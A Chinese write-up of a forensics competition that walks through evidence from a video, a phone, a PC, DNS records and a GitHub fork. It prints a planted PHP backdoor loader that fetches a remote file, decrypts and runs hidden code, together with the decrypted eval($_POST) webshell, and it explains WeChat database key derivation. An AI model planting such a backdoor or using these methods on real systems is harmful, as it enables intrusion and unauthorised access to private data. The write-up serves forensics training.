检材一
1. 请分析检材一,该取证录像文件的 SHA256 值为 (大写)
解压检材一,可以得到三个文件
计算取证录像文件的 SHA256 即可,我用的是美亚工具集(免费)
2. 请分析检材一,远程取证所使用的 OBS 工具版本号为
打开 MP4,开头就是 29.1.3
3. 请分析检材一,该检材所使用的远程取证的工具名称为
网镜
快照大师
网页专家
网页取证能手
网镜
4. 请分析检材一,在该检材中,远程取证过程中校验的北京时间为
2025/4/9 13:33:18
2025/4/9 13:34:18
2025/4/9 13:35:18
2025/4/9 13:36:18
2025/4/9 13:36:18
5. 请分析检材一,远程取证的网站 IP 地址为
172.16.10.200(laozhao.com)
6. 请分析检材一,在该检材中,远程取证的网站密码为
admin123
7. 请分析检材一,在已固定的“订单列表”中发现有一页缺失,请找出缺失页面的具体页码为
难道要一个一个查么,从头查,第 12 页没有
8. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计订单的总数为
**直接在下面可以看到是 4000 **
9. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发” 的订单数为
238 个。
肉眼看,或者使用 umi ocr,但是误差挺大的,还有个 wps 多图片转 excel 表格等等一些工具,但都需要会员
10 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发” 的ZK-101产品的订单数为
思路一样,只不过筛选一下就行了
11. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发” 产品在上海区域的订单数为
这个需要在代理页面看,上海区域有几个,找的到了 5 个
然后思路就和前面的一样,筛选一下
12. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的销售情况,并计算“赵磊(13967346658)”优惠后的总金额为(例如,优惠率为10%时按原单价的90%计算)
就是筛选出来老李的,然后按照优惠率计算,加在一起就行。最后是 4390
13 请分析检材一,补充“代理列表”中缺失页面的数据后,统计代理人的最大层级数为(其中顶级代理的用户定义为第1层)
这个的话,看视频可以找到代理列表少一页,补上。然后按题目的要求来就行了
**最后是 5 **
14. 请分析检材一,补充“代理列表”中缺失页面的数据后,统计每位代理的直接下游人数, 并确定直接下游人数排名第一的代理人为
**这个也是筛选 出现次数最多的上级代理ID即可 ,最后结果是 李玲娟 **
15. 请分析检材一,补充“代理列表”中缺失页面的数据后,根据地址信息统计各区域的代理人数,并确定上海区域的代理人数为
这个最简单,随便看 5 页就看到了 5 个人
检材二
1. 请分析检材二,请分析"手机"检材,并回答,该手机的device_name是?
在日志这里搜索 device,找到了Redmi 6 Pro。
然后我看最近文档是一个合理的选择
2. 请分析检材二,请分析"手机"检材,并回答,嫌疑人pc开机密码是什么?
刚开始在微信记录里面找,又在输入法里面找都没有。
然后想到可能是记录在 apk 里面了,找到三个可能的软件---备忘录,变迁,懒猫笔记本
我看的是便签,先复制包名,在文件系统里面搜索,然后选择在 data 目录下的
在这里找到了密钥环1qaz2wsx3edc
但没找到 pc 密码,然后看备忘录日记
一样的思路,在这里自适应此列,就不需要再复制到外面。
可以看到 pc 密码1qaz2wsx
还有博客地址,接头暗号(后面做题会用到)
3. 请分析检材二,请分析"手机"检材,并回答,嫌疑人接头暗号是什么?
看到上面那个直接搜索 ub690t1mq9kelnah.png
爱能不能够永远单纯没有悲哀
4. 请分析检材二,请分析"手机"检材,并回答,嫌疑人存放的秘钥环是多少?
见第二题1qaz2wsx3edc
5. 请分析检材二,请分析"手机"检材,并回答,嫌疑人一生中最重要的日子是什么时候?
习惯在微信这些地方找了,没找到。然后突然想起,手机有个倒数日那个软件
但是没周到什么有用的东西
那可能保存在某个图片里面,尝试搜索图片或者截图相关的单词 shots,shot,Screenshot,Screen capture,screen。一起或者拆开搜,看情况 snapshot
然后就找到了。
直接把这个图扔给 ai,问是几月几日,或者自己算一下
2026-02-26
6. 请分析检材二,请分析"手机"检材,并回答,嫌疑人微信生成的聊天记录数据库文件名称是什么?
这个简单,随便找一端话,跳转到源文件就行
EnMicroMsg.db
7. 请分析检材二,请分析"手机"检材,并回答,嫌疑人微信账号对应的 UIN 为多少?
这个题特别坑,找了半天找不到,其实在微信账号信息那里,把 uin 勾选上就好了,默认是没有的
** 1864810197**
然后还可以在这里找到,这种东西一般会放到 xml 文件里面。
高级搜索,或者在文件分类里面选择 xml 搜索都可以。、
我这里搜 key,纯意外发现的,因为后面有个题问密钥,我就在 xml 文件这里搜了个 key
更可靠的思路是,这个微信 uin,肯定是在微信这个包里面的
不过不是很好找
8. 请分析检材二,请分析"手机"检材,并回答,嫌疑人微信聊天记录数据库的加密秘钥是什么?
妙妙小工具
**不会,用 WXjzc **师傅的妙妙小工具ForensicsTool可以直接算出来
这里 imei 不需要填的原因在下面原理可知
原理
方法一
- **字符串 = **
<span class="ne-text">IMEI</span>+<span class="ne-text">UIN</span> - **对这个字符串进行 **MD5 加密。
- 取加密结果的 前7位**(小写)作为密钥。**
**另外, 如果微信在创建数据库时没有获取到 IMEI 信息, 则会使用 **<span class="ne-text">1234567890ABCDEF</span> 代替 IMEI.
**这种情况下 **<span class="ne-text">auth_info_key_prefs.xml</span> 文件中会缺少 IMEI 信息
在前面我们知道了,只有 UIN 的信息,没有 imei 所以
string**:**<span class="ne-text">1234567890ABCDE+1864810197</span>
MD5**:31ad809d9a24ad6c07354222f4574485**
key**:31ad809**
方法二
**使用开源工具(推荐) **
对于新版本微信,推荐使用自动化工具,它们能通过动态分析内存来获取真实的 32 位密钥。
- PyWxDump**:一款专注于微信数据解密的工具,支持密钥提取-数据库解密-数据导出全自动流程 。**
- 其他工具**:如 Frida + Hook 技术,可以动态拦截微信运行时的密钥 。**
新版微信(Android 10+)的加密机制已升级,此方法成功率下降 。
验证
在资源管理器打开
然后直接拖入SQLiteStudio 或者DB Browser for SQLite (SQLCipher)(DB4S) 版本
然后输入密钥等,查看是否连接成功
9. 请分析检材二,请分析"手机"检材,并回答,嫌疑人“欠条.rar”的解压密码是多少?
在微信聊天记录可以看到”密码是你的号码“,然后现在后面找到了3170010703
还有一个思路是回到****图片消息里面,右键图片回到原始位置**,找到其****缩略图路径**
发现找到长得像的图片
识别之后也可以得到手机号
https://www.qrscanner.org/zh-cn/scan-qr-code-from-image
https://the-qr-scanner.com/zh-CN
10."欠条.rar"解压后, 其中 VeraCrypt 容器的 MD5 值是多少
**这个不用多说,解压出来计算就行 **
**83da62aabc88cb1b23e9469142b67b80 **
11."欠条.rar"解压后, 其中"1.png"图上显示的 VeraCrypt 容器密码是多少
可以在背景上隐约看到,可以把照片大概处理一下,用随波逐流等工具,差不多能看清就行
<span class="ne-text">#!@KE2sax@!da0h5hghg34&@</span>
12. 请分析检材二,请分析"手机"检材,并回答,嫌疑人李某全名是什么?
**这个直接在案简介就有,**李安弘
或者欠条那个挂载就可以得到
13. 请分析检材二,请分析"手机"检材,并回答,嫌疑人欠款金额是多少?
见上题, 80000
检材三
1. 请分析检材三,请分析"电脑"检材,并回答,该电脑最后一次开机时间是?
2025-04-14 11:49:47
2. 请分析检材三,请分析"电脑"检材,并回答,嫌疑人的备用机号码是多少?
这个不会,看了其他师傅的 wp。
先右键跳转到源文件,然后用DB Browser for SQLite 打开
找到原内容 content 这一列
可以看出来是 base64 编码的图片
从 data:image 一直复制到=,在网页中打开,改后缀为 png 即可
3. 请分析检材三,请分析"电脑"检材,并回答,域名dgy02.com曾保存过一个密码,该密码是多少?
仿真,打开谷歌找到密码管理工具就行了,tcgg123456
4. 请分析检材三,请分析"电脑"检材,并回答,其电脑安装的微信版本是多少?
在用户痕迹可以找到,4.0.0.21
5.请分析检材三,请分析"电脑"检材,并回答,该系统有哪些远程控制软件
todesk
向日葵
raylink
爱思远控
从这里可以看到下载了 todesk
仿真的桌面有个向日葵
然后就找不到别的了,所以答案就是前两个
6. 请分析检材三,请分析"电脑"检材,并回答,电脑2025年4月10日11点4分29秒曾被向日葵远程控制,其记录的日志文件名为
打开向日葵,右上角,点击日志
发现只有这个时间范围包含了题目上的时间。sunlogin_service.log.2
或者在这里找
7. 请分析检材三,请分析"电脑"检材,并回答,电脑2025年4月10日11点4分29秒曾被向日葵远程控制,日志内记录对方公网IP地址和端口为
那就打开看看116.192.161.222:2577
192.168.3.192是本地局域网IP(私有IP,非公网)。
116.192.161.222是公网IP,由P2P服务器(Sunlogin的P2P节点)通过NAT穿透机制检测并返回给客户端,代表这台电脑在互联网上的真实出口IP。
**日志中出现的 **<span class="ne-text">182.100.46.36</span>是向日葵P2P服务器的IP
8. 请分析检材三,请分析"电脑"检材,并回答,某文件的MD5值为“ 2bdfcdbd6c63efc094ac154a28968b7d”,该文件名为
看了最近文档,试试算 MD5 值,发现和题目一样important.docx
9. 请分析检材三,请分析"电脑"检材,据调查,上述文件存放了钱包助记词,第一个单词是什么?
直接打开什么都没有,我用记事本打开,发现一些线索,pk 开头是一个压缩文件。
解压之后,在这里可以找到一个照片,里面就是助记词 solution
10.请分析检材三(“我的测试机”),最近曾访问过的音频文件,该音频文件的文件名是什么
在嵌套虚拟证据,那里跳转到源文件
选择 vmdx 文件(镜像文件),添加为新检材。
**然后在用户痕迹中找到 自传小说.mp3 **
11.请分析检材三(“我的测试机”),最近曾使用过USB设备,该设备的名称为
ThinkPLus
Toshiba
Samsumg
Database
在 usb 设备信息里面找到ThinkPLus
12. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人现任妻子毕业的大学是?
在文件分析的音频里面找,最大的,然后直接听。
发现听了一小段就没声音了
我就用Audacity 打开,发现是一段一段有声音,那就可以继续听了
或者用音频转文字工具,我用的百度网盘,刚好我有会员
北京大学
不知道为什么,我的音频有一小段听不到声音了,这段刚好是北京大学这个答案的附近
13. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人是通过一个朋友认识的陈老板,该朋友姓氏拼音是?
wang
14.请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人所说的香格里拉大酒店实则是?
棋牌室
SPA
灰色产业链场所
网咖
酒店
灰色产业链场所
15. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人银行密码是多少?
完全不会,找不到。
看了别人的 wp,是分割开的音频有 13 段,每段首个字组成在一起是
我得银行密马事凌起一四就而,我的银行密码就是 071429
互联网固证
1. 请分析检材二,找到李某上游人员陈某博客宣传所用根域名为(根域名)
在聊天记录里面chen.foren6
或者那个照片上也有
2.请分析陈某宣传所用域名,该域名的顶级域名在以下那个区块链注册
ETH
HNS
BTC
Namecoin
- ETH:指以太坊的命名服务(如 ENS,域名以 .eth 结尾)
- Handshake(HNS) 确实是一个去中心化 DNS 根区的区块链协议,它允许用户 自定义注册顶级域(TLD),并且这些顶级域在 Handshake 的系统中不需要经过 ICANN 批准。
- BTC**:比特币网络一般不直接管理域名系统(尽管有类似 BitDNS 的讨论,但未成为主要命名方案)**
- Namecoin**:是早期的区块链域名系统,支持 .bit 等域名**
所以应该是第二个,可以自定义注册
3. 请分析陈某宣传所用域名的顶级域名的域名解析服务器(DNS)共有几个
目前最好的方法
这个题有很多方法,目前最简单、可行的就是Shakeshift • Handshake (HNS) Explorer进入这个网址搜索
发现有两个 NS(name server)
NS 是 DNS 记录类型中的一种,全称是 Name Server(域名服务器)。
它的作用是指定哪个 DNS 服务器负责解析这个域名**。简单来说,它告诉互联网:“如果你想找 **<span class="ne-text">varo.</span>这个域名的信息(比如 IP 地址、邮箱服务器等),请去问 <span class="ne-text">ns1.varo.</span>和 <span class="ne-text">ns2.varo.</span>这两个服务器。”
其他方法( hsd 还靠谱点,但 GitHub 上只有适用 linux 的,下载还慢,其他方法,网站压根访问不到)
方法一:使用 <span class="ne-text">hsw-cli</span>(hsd 自带命令行工具)
- 确保你的 hsd 节点已同步到最新区块。
- 执行:hsw-cli getnameresource foren6
方法二:用公共 Handshake 解析器(无需本地节点)
可以用第三方网关/解析器代查,例如:
- 向公共 DNS 服务器发请求(支持 HNS 的):
- 查询入口**:https://hdns.io/(官网有简易查询框)**
- dig @hdns.io NS foren6
# 或用其他支持 .hns 的 DoH/DoT 端点
- **或者用在线工具(如 hns.to)输入 **
<span class="ne-text">foren6</span>查看其解析详情。
方法三:通过区块链浏览器查 NS 配置
**访问支持 HNS 的区块浏览器(如 hnscan.com),搜索域名 **<span class="ne-text">foren6</span>,在“资源记录/Resource Records”区域找到 NS 条目。
方法四: Namebase 官方区块浏览器(主网专用)
- 网址**:**https://www.namebase.io/explorer
- 特点**:Namebase 是 Handshake 生态的核心交易所+注册商,他们的浏览器专门针对域名展示优化过,直接搜
<span class="ne-text">foren6</span>能看到:是否已注册、注册时间、到期高度、资源记录(含 NS/A/CNAME 等)。** - 稳定性**:企业级运维,比个人搭建的 HNScan 实例稳得多。**
方法五:HNS.to 转换代理(验证域名是否可被浏览器访问)
- 网址**:**https://hns.to/
- 用法**:在输入框填 **
<span class="ne-text">foren6</span>(不带后缀),它会尝试把 HNS 域名映射到传统 DNS,并显示解析到的 IP/站点。 - 价值**:如果它能打开,说明 **
<span class="ne-text">foren6</span>不仅注册了,而且配置了可被传统互联网访问的 DNS/Web 服务;反之则可能只上了链但没配服务。
方法六: ShakeDex 第三方区块浏览器(备用)
- 网址**:https://shakedex.com/(或搜 ShakeDex explorer)**
- 定位**:偏交易/市场视角,但同样支持查域名的注册状态和基础资源记录,作冗余核对用。**
但是我都访问不到这些网站
4. 请分析陈某宣传所用域名的顶级域名的NS1服务器ip为
**点击这个 **
** **
**45.79.133.98 **
- NS 记录 告诉了你域名服务器叫什么:
<span class="ne-text">ns1.varo.</span>。 - GLUE4 记录 直接给出了它们的 IP:
<span class="ne-text">45.79.133.98</span>。 - DS 记录 则是用于安全验证的,通常在做 DNSSEC 相关的题目时会用到。
其他方法的话就是用 dig 查询
详细的可以看看其他师傅的 wp
5. 请分析陈某宣传所用域名,该域名DNS记录指向邮件服务器域名为
** mail.163.com **
这里尝试使用****nslookup 命令查看域名解析,可能是比赛后 DNS 服务关闭了,没收到服务器响应
ip:nslookup ns1.varo.domains
DNS记录指向邮件服务器域名:nslookup -type=MX chen.foren6/nslookup -type=MX chen.foren6 ns1.varo.domains
或者在 window 上下载 blind9**,就可以使用 dig 命令**
在 linux 或 mac 上自带** dig,用虚拟机卡里,Ubuntu 都行**
ip:dig ns1.varo
DNS记录指向邮件服务器域名:dig mx chen.foren6
6. 请分析陈某宣传所用域名,该域名的txt记录中chen的值为
** fengbaoliejiu **
dig txt chen.foren6
<span class="ne-text">dig ANY @ns1.varo.domains chen.foren6</span>(可以得到 5.6 题的答案)
nslookup -type=TXT chen.foren6/nslookup -type=TXT chen.foren6 ns1.varo.domains
7.请分析陈某宣传所用域名,该域名DNS记录没有以下那个域名
admin.chen.foren6
caidan.chen.foren6
fic.chen.foren6
hl.chen.foren6
A 记录(Address Record)是 DNS 中最基础的一种记录类型,用来将域名直接映射到一个 IPv4 地址。
**告诉 DNS 客户端:“这个域名对应哪台服务器的 IPv4 地址”,例如把 **<span class="ne-text">www.example.com</span>指向 <span class="ne-text">192.0.2.10</span>
根域名(<strong><span class="ne-text">.</span></strong>)的 SOA 记录是 DNS 根区的权威起始信息,定义了根域自身的版本号、更新策略与超管邮箱,但不存储具体网站的 IP(那是下级的事)。
- **MNAME(Primary Master):根区主服务器主机名,通常是 **
<span class="ne-text">a.root-servers.net</span>之类。 - **RNAME(Responsible Person):管理责任人邮箱(格式特殊,如 **
<span class="ne-text">nstld.verisign-grs.com</span>对应<span class="ne-text">nstld@verisign-grs.com</span>)。 - Serial/Refresh/Retry/Expire/Minimum**:序列号与同步策略,控制下游缓存何时拉新。**
SOA 是所有正规 DNS 区域的起点标记**,根区也不例外:**
- 告诉递归解析器“这是合法的根区数据来源”;
- **为下级(如 **
<span class="ne-text">.com</span>)提供同步基准。
ANY @ns1.varo.domains admin.chen.foren6 有 MX 记录
ANY @ns1.varo.domains caidan.chen.foren6 有 A 记录
**ANY @ns1.varo.domains fichen.foren6 只有根域名的 SOA 信息 **
**ANY @ns1.varo.domains hl.chen.foren6 只有根域名的 SOA 信息 **
8. 请分析陈某宣传所用域名,该博客域名最终DNS解析指向的github仓库名
这个直接在 GitHub 上搜 chen.foren6 就可以找到chewhaoN.github.io
9. 请分析陈某github账号,陈某对jkroepke/2Moons项目增改了几个文件
搜一下jkroepke/2Moons,分别把他们的项目 clone 下来,用文件比较工具Scooter Software - Home of Beyond Compare这个免费 30 天试用。
选中要比较的两个文件或文件夹,右键比较。
然后选中其中一方的所有文件,右键比较内容**,选****基于规则的比较并显示结果框**
可以看到有俩个不一样
10. 请分析陈某github账号,陈某在修改2Moons过程中提到了什么锅底
打开这个差异文件**,可以看到$a=file_get_contents('**https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"\n".$i);include $k;unlink($k);yijuhua();
url 解码一下,蜂蜜锅底
11. 请分析陈某github账号,陈某在游戏2Moons中放置的后门连接码的密码为
这是差异文件的多的内容**,可以看到需要'**https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css的信息,但是访问一下,发现地址过期了
$a = file_get_contents(''); // 获取当前文件(或空字符串)的内容
$b = md5($a, true); // 将 $a 的内容进行 MD5 哈希,以原始二进制形式返回,作为 AES 密钥
$c = file_get_contents('../../../../encrypted.bin'); // 读取上级目录中的加密文件
$d = base64_decode($c); // 对加密文件进行 base64 解码
$e = 'aes-256-cbc'; // 指定加密算法为 AES-256-CBC
$f = openssl_cipher_iv_length($e); // 获取该算法的初始化向量(IV)长度
$g = substr($d, 0, $f); // 从解码数据中提取 IV
$h = substr($d, $f); // 剩余部分是加密的密文
$i = openssl_decrypt($h, $e, $b, OPENSSL_RAW_DATA, $g); // 使用 MD5 结果作为密钥,解密数据
$j = sys_get_temp_dir(); // 获取系统临时目录路径
$k = $j . '/func_' . uniqid() . '.php'; // 生成唯一的临时 PHP 文件名
file_put_contents($k, "<?php\n" . $i); // 将解密内容写入临时文件
include $k; // 包含(执行)该文件
unlink($k); // 删除临时文件
yijuhua(); // 调用解密后代码中的函数(可能是恶意代码入口)
这个其实就是代码审计题目,这种可以问 ai,也可以自己写脚本
解密后是这个,密码 就是 ficnb
function yijuhua() {
echo "Kangle) is OK! FICer is good!";
eval($_POST[ficnb])
}
12. 请访问陈某当前博客,陈某课程的扫码报名地址的域名为
https://chewhaoN.github.io/博客也是访问不到了,git clone https://github.com/chewhaoN/chewhaoN.github.io.git,也不行,说是 ssl 证书有问题
直接看 GitHub 里面吧
扫一下****peixun.chen.foren6
但好像不对,是有俩二维码.
**没招了,不知道为啥,新开标签什么的也不行,应该还是那个原因,扫完之后应该是 fic.forensix.cn **
13. 请分析陈某当前博客,通过互联网找到陈某的旧博客网站标题为
就是这个网站
但是这网站早没了
到可以用这个 Internet Archive ,但是访问不了这个网站了
互联网档案馆
简单说,这个项目唯一的目的就是备份,从 1996 年至今,已经收录了 8430 亿个网页快照。
或许这个博客有用
**查看一下的话标题是 **柳如烟大战霸天虎
14. 请分析陈某旧博客,陈某的姓名为
只能借用 其他师傅 的图片呢了,陈浩北
15. 请分析陈某旧博客,陈某的邮箱地址为
在网站源代码里面****mailme@chen.foren6,还有个手机号
16. 请分析陈某旧博客,陈某的11位手机号为
13170010703,见上题
17.请分析陈某旧博客,陈某最爱的dota英雄为
赏金猎人
幻影刺客
斧王
邪影芳灵
博客标题,圣刀会也没我这么厉害,邪影芳灵
